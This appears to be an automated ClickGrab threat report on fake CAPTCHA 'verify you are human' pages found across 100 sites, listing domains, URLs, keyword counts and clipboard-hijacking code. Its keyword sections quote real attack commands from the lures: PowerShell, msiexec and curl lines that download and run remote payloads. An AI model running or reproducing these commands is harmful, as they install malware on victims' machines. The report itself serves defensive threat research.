ClickGrab Threat Analysis Report - 2026-03-02
Generated on 2026-03-02 03:30:49
Executive Summary
- Total sites analyzed: 100
- Sites with malicious content: 44
- Unique domains encountered: 120
- Total URLs extracted: 2,298
- PowerShell download attempts: 1
- Clipboard manipulation instances: 225
Domain Analysis
Most Frequently Encountered Domains
- baovechuyennghiep.baovengayvadem.com: 696 occurrences
- adturekorea.co.kr: 214 occurrences
- www.ccera-icar.org: 178 occurrences
- brickmechanics.com: 151 occurrences
- 18.176.47.246: 112 occurrences
- shaunhickeyministries.com: 100 occurrences
- www.etsy.com: 64 occurrences
- 44.208.147.17: 48 occurrences
- www.google.com: 40 occurrences
- www.grantmurrayhomes.com: 37 occurrences
- i.postimg.cc: 34 occurrences
- icons.duckduckgo.com: 34 occurrences
- ${host}: 34 occurrences
- bl555.gratis: 30 occurrences
- vodokanal.kiev.ua: 28 occurrences
URL Pattern Analysis
reCAPTCHA imagery
5 occurrences across 2 distinct URLs
https://pizzabyte.com.au/smartdetection/deviceverification/CF/path/captcha(3 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)
Font resources
23 occurrences across 18 distinct URLs
https://18.176.47.246/wp-content/plugins/vk-post-author-display/vendor/vektor-inc/font-awesome-versions/src/font-awesome/css/all.min.css?ver=7.1.0(2 times)https://adturekorea.co.kr/js/font-awesome/css/font-awesome.min.css?ver=220620(2 times)https://use.fontawesome.com/releases/v5.6.3/css/all.css(2 times)https://adturekorea.co.kr/theme/FT_WEB20/css/icofont.min.css(2 times)https://use.fontawesome.com/releases/v5.0.0/css/all.css(2 times)- ...and 13 more distinct URLs
CDN hosted scripts
26 occurrences across 12 distinct URLs
https://transcend-cdn.com/cm/ac71e058-41b7-4026-b482-3d9b8e31a6d0/airgap.js(10 times)https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/icons/gift.svg(2 times)https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/icons/box-arrow-in-right.svg(2 times)https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/icons/person-plus.svg(2 times)https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/icons/whatsapp.svg(2 times)- ...and 7 more distinct URLs
Google resources
49 occurrences across 12 distinct URLs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(34 times)https://www.etsy.com/dac/neu/modules/listing_card_no_imports.ba269cdecb93d2,common/stars-svg.ba269cdecb93d2,neu/modules/favorite_listing_button.ba269cdecb93d2,neu/modules/quickview.ba269cdecb93d2,listzilla/responsive/listing-page-desktop.ba269cdecb93d2,category-nav/v2/breadcrumb_nav.fe3bd9d216295e,common/grid.fe3bd9d216295e,listings3/similar-items.ba269cdecb93d2,neu/common/responsive_listing_grid.ba269cdecb93d2,neu/modules/favorite_button_defaults_no_imports.ba269cdecb93d2,common/listing_card_text_badge.fe3bd9d216295e,neu/modules/listing_card_signals.9293ad9010af5b,__modules__ListingPage__src__/TrustSuiteBanner/styles.ba269cdecb93d2,web-toolkit-v2/modules/banners/banners.ba269cdecb93d2,web-toolkit-v2/modules/forms/radios.ba269cdecb93d2,__modules__Favorites__src__/MiniCollectionsMenu/View.ba269cdecb93d2,web-toolkit-v2/modules/panels/panels.ba269cdecb93d2,listing-page/image-carousel/responsive.ba269cdecb93d2,listzilla/image-overlay.ba269cdecb93d2,__modules__ListingPage__src__/Price/styles.311438d934a7bf,__modules__ListingPage__src__/ShopHeader/ReviewStars/review_stars.02149cde20b454,common/simple-overlay.fe3bd9d216295e,neu/payment_icons.fe3bd9d216295e,neu/apple_pay.fe3bd9d216295e,neu/google_pay.ba269cdecb93d2,listings3/checkout/single-listing.ba269cdecb93d2,common/forms_no_import.ba269cdecb93d2,listzilla/responsive/apple-pay.fe3bd9d216295e,shop2/modules/regulatory-seller-details.fe3bd9d216295e,shop2/modules/seller-additional-details.fe3bd9d216295e,neu/common/follow-shop-button.fe3bd9d216295e,listzilla/responsive/review-content-modal.ba269cdecb93d2,appreciation_photos/photo_overlay.ba269cdecb93d2,listzilla/reviews/reviews_skeleton.fe3bd9d216295e,listzilla/reviews/reviews-section.ba269cdecb93d2,reviews/header.ba269cdecb93d2,listzilla/reviews/variations.ba269cdecb93d2,listzilla/responsive/max-height-review.fe3bd9d216295e,reviews/categorical-tags.ba269cdecb93d2,web-toolkit-v2/modules/chips/selectable_chip.ba269cdecb93d2,web-toolkit-v2/modules/chips/chip_group.ba269cdecb93d2,sort-by-reviews.3affa09ef32549,web-toolkit-v2/modules/dialogs/sheets.ba269cdecb93d2,__modules__Reviews__src__/DeepDive/ListingPage/styles.ba269cdecb93d2,listzilla/responsive/tags.ba269cdecb93d2,__modules__ListingPage__src__/SellerCred/Header/styles.ba269cdecb93d2,shop2/common/rating-and-reviews-count.ba269cdecb93d2,__modules__ListingPage__src__/SellerCred/Badges/styles.ba269cdecb93d2,__modules__ListingPage__src__/Recommendations/RecsRibbon/view.ba269cdecb93d2,web-toolkit-v2/modules/forms/checkboxes.ba269cdecb93d2,web-toolkit-v2/modules/action_groups/action_groups.c0f395ece04ab8,favorites/collection/list.ba269cdecb93d2,favorites/collection/row.ba269cdecb93d2,favorites/adaptive-height-desktop.ba269cdecb93d2,__modules__ConditionalSaleInterstitial__src__/styles.02149cde20b454,__modules__CollectionRecs__src__/Views/Grid/view.ba269cdecb93d2,__modules__CollectionRecs__src__/Views/Card/view.ba269cdecb93d2.css?variant=sasquatch(2 times)https://www.googletagmanager.com/gtag/js?id=UA-86972255-1(2 times)https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d38377.599722420644!2d106.65241824757776!3d10.802916754371077!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0x927f53ecdcf6de52!2zQ8OUTkcgVFkgVE5ISCBE4buKQ0ggVuG7pCBC4bqiTyBW4buGIE5Hw4BZICYgxJDDik0gKFZQKQ!5e0!3m2!1svi!2s!4v1646897995209!5m2!1svi!2s(2 times)https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(2 times)- ...and 7 more distinct URLs
Suspicious Keyword Analysis
Total Keywords Found: 759 (73 unique)
Keyword Categories
Social Engineering
24 unique keywords
Verification Hashexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";CAPTCHA VerificationVerification IDcommand = "msiexec /i https://seo-conference.by/wp-themes/Cioudfiare/Verification/UserID63894525i5832";verification_idRobotverification-code-containerI am not a robotcommand =msiexec /i https://i-iike-eie-phants-verification.iive/iamchaiienge/verification/UserID7383526;- ...and 14 more
System Commands
38 unique keywords
cmd = ezstandaione.cmd || [];</script>cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;";`exec /i http://inkbookwriters.com/verify';command = 'powersheii -wi mi -EP B -c iex(irm kernsjewe.com/downioad/os.txt)';command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';command {cmdcommand terminai-font">exec /i http://inkbookwriters.com/verify /qn';- ...and 28 more
Verification Text
3 unique keywords
Hiddenhiddenray id
Technical Terms
8 unique keywords
.exeRay IDResponseTextBypassresponseTextWinHttpRequestiexfailed_to_retrieve
Most Frequent Keywords
- hidden: 57 occurrences
- robot: 53 occurrences
- Robot: 43 occurrences
- verification: 43 occurrences
- Verification: 38 occurrences
- I am not a robot: 37 occurrences
- To better prove you are not a robot: 37 occurrences
- CAPTCHA Verification: 36 occurrences
- Verification ID: 36 occurrences
- Ray ID: 36 occurrences
- verification-id: 36 occurrences
- Verify you are human: 36 occurrences
- Checking if you are human: 35 occurrences
- const command =: 35 occurrences
- cmd: 19 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, command = 'cmd /c "curi -s http://i78.i7.59.40:5506/qk.vbs -o %temp%\\qk.vbs >nui && wscript.exe //B //E:VBScript %temp%\\qk.vbs"';, cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';, command = 'cmd /c "curi -s http:/i98.i3.i58.i27:5506/dd.vbs -o %temp%\dd.vbs >nui && start /b wscript.exe //B //E:VBScript %temp%\dd.vbs && exit"';
Group 2: CAPTCHA Verification, Verification, verification
Group 3: Verification ID, verification-id, verification id, Verification Hash, verification_id
Group 4: Ray ID, ray id
Group 5: Robot, robot
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
com/recaptcha/about/images/reCAPTCHAau/smartdetection/deviceverification/CF/path/captc...0b46748129f334733f7c05846885ff8a03676d3cb7f1efb79e83a88650fb78b60b37a2149f1004bb97dc1186654d4721
Clipboard Manipulation Analysis
Detected clipboard manipulation in 225 instances.
Document.Execcommand Copy
Found in 112 snippets (49.8% of clipboard code)
Examples:
document.execCommand("copy")
try { document.execCommand('copy')
document.execCommand('copy')
Textarea Manipulation
Found in 113 snippets (50.2% of clipboard code)
Examples:
ng is the safe placeholder above const textarea = document.createElement('textarea'
tListener("click", function () { const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.